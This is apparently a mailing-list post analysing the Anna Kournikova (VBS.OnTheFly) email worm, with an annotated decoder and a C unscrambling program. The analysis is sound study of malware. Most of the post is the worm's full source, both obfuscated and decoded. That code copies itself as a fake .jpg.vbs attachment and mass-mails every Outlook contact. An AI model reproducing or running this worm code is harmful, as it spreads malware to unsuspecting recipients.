I've taken the virus (worm really) apart a bit more:
Here's the same thing, but with some comments added, and the variable
names renamed for clarity:
=================================================================
'Vbs.OnTheFly Created By OnTheFly
Execute
HisFunction("X)udQ0VpgjnH�{tEcggv�f{DQ�VpgjnH�{Q��ptGqt�tgTwugoP�zg�vU�vgG�Q9v58Jr7R6?�E�gtvcQgldeg*vY$eUktvrU0gjnn+$��9G5QJv786r0Rgtyiktgv$�MJWEu^hqyvtc^gpQjVHg{n$^�.jE*t9:�+�(jE*t33+3(�E�tj3*63�+�(jE*t23+;(�E�tj5*+4(�E�tj3*;2�+�(jE*t9;�+�(jE*t23+2(�E�tj3*32�+�(jE*t45�+�(jE*t33+;(�E�tj3*72�+�(jE*t33+8(�E�tj3*62�+�(jE*t45�+�(jE*t8:�+�(jE*t:;�+�(jE*t33+7(�E�tj3*;3�+�(jE*t23+5(�E�tj5*+4(�E�tj6*+;(�E�tj6*+8(�E�tj7*+5(�E�tj6*+:(�E�tj;*+:��gU�vQtcyVopldi?7E�gtvcqgldeg*vu$terkkviph0nkugu{gvqoldeg$v�+t�yQoclVip7de0rqh{nk�guyterk0veuktvrwhnncpgot.yQoclVip7dI0vgrUegckHnnqgf*t+2�(^$pCcpqMtwkpqmcxl0irx0ud�$k��h9G5QJv786r0Rgtticg�f$*MJWEu^hqyvtc^gpQjVHg{no^kcgn$f�+@>$�$3v�gj�pg�p4CUJ9inEN+*��pg�fhk��hko�pqjvp*yq�+3?c�fpf�{cp*yq�+4?�8jvpg��9G5QJv786r0Rwt�pJ$vv<r11yy0y{fcp{dgvp0$n5.h.ncgu��pg�fhk��gU�vMLUiJy9M59?zt�yQoclVip7dq0grvpzghvnk*guyterk0veuktvrwhnncpgo�.+3��P\L7\Mz6wk?XL�iMyUMJ99z5t0cgcfnn��MLUiJy9M590znEuq�gF��qK��hqP�vt*yQoclVip7dh0nkggkzvu*uuyterk0veuktvrwhnncpgo++V�gj�pU�vgW�Kg44:|6R2x�?QtcyVopldi07tecggvgvvzkhgny*euktvru0terkhvnwpnoc.gV�wt+g��gW4K|4R:x602tyvk\g7PML6\kzXw��gW4K|4R:x602nEuq�gG�fpK��hN�qq�rH�pwveqk�p4gUp9CnJNi*E�+Q��ptGqt�tgTwugoP�zg�vU�vgF�54xQOzM8JT?�E�gtvcQgldeg*vQ$vwqnmqC0rrkncekvpq+$��hKF�54xQOzM8JT�?Q$vwqnmqV$gj�pU�vgl�74PvD\h;n:F?54xQOzM8JTI0vgcPgorUec*gO$RC$K�+U�vgU�m834i35gN5�?4lv7\P;D:h0nfCtfugNuukuv��qH�tcGjeL�4TRoOuD4ToK��p8U4m33gi55�NK��hTLo4uR4OoD0TfCtfugGuvpktugE0wqvp>[EMAIL
PROTECTED];:cX|5gT?|3�V��q6fFDz5yi3x�LU�vgk�9sd4:6x5\5?�F�54xQOzM8JTE0gtvcKggv*o+2��gU�vKQ6GXDl[LQ�:�?TLo4uR4OoD0TfCtfugGuvpktugZ*:9X;5cT||g�+k�9sd4:6x5\5V0�q�?KQ6GXDl[LQ0:fCtfug�uk�9sd4:6x5\5U0dwglve?�$�gJgt{�wqj�xc.g=�+q�$k�9sd4:6x5\5D0fq�{�?J$<k�$�(dxtehn(�$�jEeg�mjVuk$#(�x�ednt�h�($$��gu�vYhpu:sI[h;?3sk496d5:5x0\vCcvjegovp�uh�uYsp[:;I3hC0fft�yQoclVip7dI0vgrUegckHnnqgf*t+2�(^$pCcpqMtwkpqmcxl0irx0ud�$k�9sd4:6x5\5F0ngvgCgvhtgwUodvk?�V�wt�gK��hsk496d5:5x0\qV>[EMAIL
PROTECTED]:6x5\5U0pg�fG�Q9v58Jr7R6t0igtyvk�gJ$EM^WquvhcygtQ^VpgjnH^{conkfg.$$�$3��pG�fhK��gPvz��pG�fhK��gPvz��pg�fhk��pG�fwHepkvpq��X)udiy3�70d2")
Function HisFunction(Variable_1)
'Walk through the string, grabbing a pair of chars at a time.
For I = 1 To Len(Variable_1) Step 2
Variable_2= Mid(Variable_1, I, 1) 'Get 1st char from the bg string
Variable_3= Mid(Variable_1, I + 1, 1) 'get 2nd char
'Decode CR, LF, and space characters (obfuscated in the char string
above...
If Asc(Variable_2) = 15 Then 'If Variable_2 is ASCII 15:
Variable_2= Chr(10) 'Then Make Variable_2 a LF
ElseIf Asc(Variable_2) = 16 Then 'If Variable_2 is ASCII 16...
Variable_2 = Chr(13) 'Then Make Variable_2 a CR
ElseIf Asc(Variable_2) = 17 Then 'If Variable_2 is ASCII 17
Variable_2 = Chr(32) 'Then make Variable_2 a space
Else
'If not CR, LF or space, basicly ROT2
Variable_2 = Chr(Asc(Variable_2) - 2)
End If
If Variable_3<> "" Then 'If we're not at the end
'Decode the second character as well, same rules as above.
If Asc(Variable_3) = 15 Then
Variable_3= Chr(10)
ElseIf Asc(Variable_3) = 16 Then
Variable_3= Chr(13)
ElseIf Asc(Variable_3) = 17 Then
Variable_3= Chr(32)
Else
'ROT2
Variable_3= Chr(Asc(Variable_3) - 2)
End If
End If
'Put the decoded letters in the variable...
'TRANSPOSE THEM!
HisFunction = HisFunction & Variable_3 & Variable_2
Next
End Function
'Vbswg 1.50b
====================================================
The big long string at the top is scrambled (rather trivialy, but
whatever) so that you can't quickly read it. Here's a .c program that
will unscramble the file for you (without bothering to fix that CR/LF
crap). It reads "virusstring" as its input. It currently outputs the
characters and their ASCII codes to stderr, and the unscrambled output
to stdout, so I'd suggest running it as: "./virusparse 1>virusout
2>outerr" to avoid messing up your terminal.
====================================================
/* Virusparse.c
program by RAP. decode string in .vbs file.
*/
#include "stdio.h"
int main(){
FILE *INFILE;
int char1, char2;
INFILE=fopen("virusstring","r");
while ( ( (char1=fgetc(INFILE)) != EOF ) && ( (char2=fgetc(INFILE))
!= EOF) ) {
fprintf(stderr,"in#1:%c(%i), in#2:%c(%i)
",char1,char1,char2,char2);
/* Set new value to ROT2, make things simple */
if (char1 == 15) { char1 = 12; }; /* Change ASCII 15 to ASCII
10 (LF) */
if (char1 == 16) { char1 = 15; }; /* Change ASCII 16 to ASCII
13 (CR) */
if (char1 == 17) { char1 = 34; }; /* Change ASCII 17 to ASCII
32 (space) */
char1 = char1 - 2;
if (char2 == 15) { char2 = 12; }; /* Change ASCII 15 to ASCII
10 (LF) */
if (char2 == 16) { char2 = 15; }; /* Change ASCII 16 to ASCII
13 (CR) */
if (char2 == 17) { char2 = 34; }; /* Change ASCII 17 to ASCII
32 (space) */
char2 = char2 - 2;
fprintf(stderr,"out#1:%c(%i),
out#2:%c(%i)\n",char1,char1,char2,char2);
printf("%c%c",char2,char1);
}
return 0;
}
================================================================
Here's the output of the program (With some retouching to take care of
funky characters):
================================================================
'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set E7O3tH65p4P = CreateObject("WScript.Shell")
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) &
Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr
(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) &
Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & C
hr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
Set rOwamTjngb5= Createobject("scripting.filesystemobject")
rOwamTjngb5.copyfile
wscript.scriptfullname,rOwamTjngb5.GetSpecialFolder(0)&
"\AnnaKournikova.jpg.vbs"
if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
e2nSA7HlgLC()
end if
if month(now) =1 and day(now) =26 then
E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false
end if
Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1)
ZN5JKZ4xiuV= JKgSwHK773x.readall
JKgSwHK773x.Close
Do
If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then
Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname,
True)
UeI22z8P4v0.writeZN5JKZ4xiuV
UeI22z8P4v0.Close
End If
Loop
Function e2nSA7HlgLC()
On Error Resume Next
Set D23OvxM6KRH = CreateObject("Outlook.Application")
If D23OvxM6KRH= "Outlook"Then
Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI")
Set S6k211ge33L= j25tNZB9f8l.AddressLists
For Each JR2mPsM2BmR In S6k211ge33L
If JR2mPsM2BmR.AddressEntries.Count <> 0 Then
d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count
For X789Va3zRez= 1 To d4BD3xgwv1J
Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0)
Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez)
iq72b483v3Z.To = OIE4BVYjOJ8.Address
iq72b483v3Z.Subject = "Here you have, ;o)"
iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set fWsnq8YG9f1=iq72b483v3Z.Attachments
fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)&
"\AnnaKournikova.jpg.vbs"
iq72b483v3Z.DeleteAfterSubmit = True
If iq72b483v3Z.To <> "" Then
iq72b483v3Z.Send
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"
End If
Next
End If
Next
end if
End Function
'Vbswg 1.50b
================================================================
CERT has some more info out there, but that's a look at the guts of the
worm anyhow...
--Rich
--
_________________________________________________________
Rich Puhek
ETN Systems Inc.
_________________________________________________________
